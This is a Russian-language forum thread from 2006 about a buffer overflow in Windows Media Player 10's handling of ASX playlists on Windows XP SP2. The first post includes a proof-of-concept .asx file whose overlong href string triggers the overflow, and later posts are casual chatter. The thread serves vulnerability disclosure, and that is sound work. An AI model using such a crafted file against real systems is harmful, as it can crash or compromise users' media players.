Переполнение буфера Windows Media Player (buffer overflow)

Discussion in 'Мировые новости. Обсуждения.' started by -=lebed=-, 24 Nov 2006.

  1. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    22 Ноября 2006 Обнародована уязвимость в обработке плейлистов asx виндоузмедиаплеером.

    Протестировано :
    Windows Media 10.00.00.4036 - версия проигрывателя
    Windows XP SP2 - версия системы

    содержимое файла *.asx:

    <asx><entry>
    <ref
    href="aa:
    /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaa.mp3"/>
    </entry></asx>

    Источник: (http://www.securityfocus.com/archive/1/452352/30/0/threaded)
    Пример эксплоита (без контоля компонентов по ссылке не ходить Х.е.З чем заряжен)
    P.S. Пробелы исключить естественно
     
    #1 -=lebed=-, 24 Nov 2006
    Last edited: 24 Nov 2006
    3 people like this.
  2. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    ужас
    /me плохо
    это из-за этого флуД в ирке?
     
  3. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Любите Light Alloy и MPLayer!!!
    +они значительно удобнее ЭТОГО.
     
  4. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    -=lebed=- так ты не знаешь из-за этого был флуд в ирке или нет?
     
Loading...